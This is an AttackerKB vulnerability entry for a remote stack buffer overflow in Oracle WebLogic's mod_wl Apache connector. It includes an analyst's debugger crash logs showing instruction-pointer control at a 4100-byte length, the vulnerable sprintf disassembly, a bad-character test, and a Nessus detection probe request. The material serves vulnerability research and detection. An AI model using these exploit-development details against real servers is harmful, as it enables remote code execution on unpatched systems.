Oracle mod_wl HTTP POST Request Remote Buffer Overflow Vulnerability

2019-05-09T17:57:49
ID AKB:957310CF-4BD0-42F5-9281-6952E61636A6
Type attackerkb
Reporter AttackerKB
Modified 2020-02-13T17:12:21

Description

Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.

Recent assessments:

wchen-r7 at 2019-09-12T18:07:05.928637Z reported:

Details

Bea Weblogic 8.1 + Apache http://docs.oracle.com/cd/E13222_01/wls/docs81/plugins/apache.html

First crash

(328.c38): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\RPCRT4.dll - *** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so - eax=00000045 ebx=006a5d58 ecx=43434343 edx=7c90e4f4 esi=10013932 edi=000000a8 eip=77ea4126 esp=0280d7ec ebp=0280e818 iopl=0 ov up ei pl nz na po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010a03 RPCRT4!NdrVaryingArrayUnmarshall+0x81: 77ea4126 008945107416 add byte ptr [ecx+16741045h],cl ds:0023:59b75388=?? 0:132> .symfix 0:132> .reload Reloading current modules ............................................. *** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so - 0:132> kb ChildEBP RetAddr Args to Child 0280e818 10001a8a 006a5d58 006b8ce0 0280fa38 RPCRT4!NdrVaryingArrayUnmarshall+0x82 *** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll - WARNING: Stack unwind information not available. Following frames may be wrong. 0280fef4 6ff0155f 006a5d58 006a1e28 006a5d58 mod_wl_20+0x1a8a 0280ff08 6ff018a9 006a5d58 006a5d58 00000000 libhttpd!ap_run_handler+0x1f 0280ff18 6ff0d97c 006a5d58 006a5d58 6ff097c6 libhttpd!ap_invoke_handler+0xa9 00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c

More controlled crash: length 4100

ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. 0440d7d4 41414141 54544820 2e312f50 000a0d31 0x41414141 *** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so - 0440e818 10001a8a 006a9388 0069cb20 0440fa38 0x41414141 *** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll - 0440fef4 6ff0155f 006a9388 0068dcf8 006a9388 mod_wl_20+0x1a8a 0440ff08 6ff018a9 006a9388 006a9388 00000000 libhttpd!ap_run_handler+0x1f 0440ff18 6ff0d97c 006a9388 006a9388 6ff097c6 libhttpd!ap_invoke_handler+0xa9 00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c

mod_wl detection via nessus

weblogic_mod_wl_overflow.nasl: "TITLE>Weblogic Bridge Message" >< res[2] ||

``` POST /index.jsp HTTP/1.1 Host: 192.168.1.130 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Length: -1

TML> <HEAD> <TITLE>Weblogic Bridge Message </TITLE> </HEAD> <BODY> <H2>Failure of server APACHE bridge:</H2><P> <hr><PRE>Internal Server failure, APACHE plugin. Cannot continue.</PRE> <hr><BR><B>Build date/time:</B> <I>Jun 16 2006 15:14:11</I> <P><HR><B>Change Number:</B> <I>779586</I> </BODY> </HTML> <HTML> <HEAD> <TITLE>Weblogic Bridge Message ```

mod_wl overflow

.text:1000E751 push ecx ; it should be HTTP/1.1 but.... failed :) .text:1000E752 push edx .text:1000E753 mov edx, [ebp+214h] .text:1000E759 push edx .text:1000E75A push offset aSSS ; "%s %s %s\r\n" .text:1000E75F push eax ; Dest .text:1000E760 call ds:sprintf ; here is where overflow happends!

GET EIP on RET

0:244&gt; p eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38 eip=1000edeb esp=0440c7b8 ebp=0440e818 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mod_wl_20+0xedeb: 1000edeb 81c41c100000 add esp,101Ch 0:244&gt; db esp 0440c7b8 1f 00 00 00 16 00 00 00-00 00 00 00 4a 01 00 00 ............J... 0440c7c8 48 6f 73 74 3a 20 31 39-32 2e 31 36 38 2e 31 2e Host: 192.168.1. 0440c7d8 31 33 30 0d 0a 55 73 65-72 2d 41 67 65 6e 74 3a 130..User-Agent: 0440c7e8 20 4d 6f 7a 69 6c 6c 61-2f 34 2e 30 20 28 63 6f Mozilla/4.0 (co 0440c7f8 6d 70 61 74 69 62 6c 65-3b 20 4d 53 49 45 20 36 mpatible; MSIE 6 0440c808 2e 30 3b 20 57 69 6e 64-6f 77 73 20 4e 54 20 35 .0; Windows NT 5 0440c818 2e 31 29 0d 0a 43 6f 6e-74 65 6e 74 2d 54 79 70 .1)..Content-Typ 0440c828 65 3a 20 61 70 70 6c 69-63 61 74 69 6f 6e 2f 78 e: application/x 0:244&gt; p eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38 eip=1000edf1 esp=0440d7d4 ebp=0440e818 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 mod_wl_20+0xedf1: 1000edf1 c3 ret 0:244&gt; db esp 0440d7d4 41 41 41 41 41 41 41 41-01 02 03 04 05 06 07 08 AAAAAAAA........ 0440d7e4 09 0b 0c 0e 0f 10 11 12-13 14 15 16 17 18 19 1a ................ 0440d7f4 1b 1c 1d 1e 1f 20 21 22-23 24 25 26 27 28 29 2a ..... !"#$%&'()* 0440d804 2b 2c 2d 2e 2f 30 31 32-33 34 35 36 37 38 39 3a +,-./0123456789: 0440d814 3b 3c 3d 3e 40 41 42 43-44 45 46 47 48 49 4a 4b ;&lt;=&gt;@ABCDEFGHIJK 0440d824 4c 4d 4e 4f 50 51 52 53-54 55 56 57 58 59 5a 5b LMNOPQRSTUVWXYZ[ 0440d834 5c 5d 5e 5f 60 61 62 63-64 65 66 67 68 69 6a 6b \]^_`abcdefghijk 0440d844 6c 6d 6e 6f 70 71 72 73-74 75 76 77 78 79 7a 7b lmnopqrstuvwxyz{ 0:244&gt; t eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38 eip=41414141 esp=0440d7d8 ebp=0440e818 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 41414141 ?? ???

References

http://www.securityfocus.com/bid/30273/info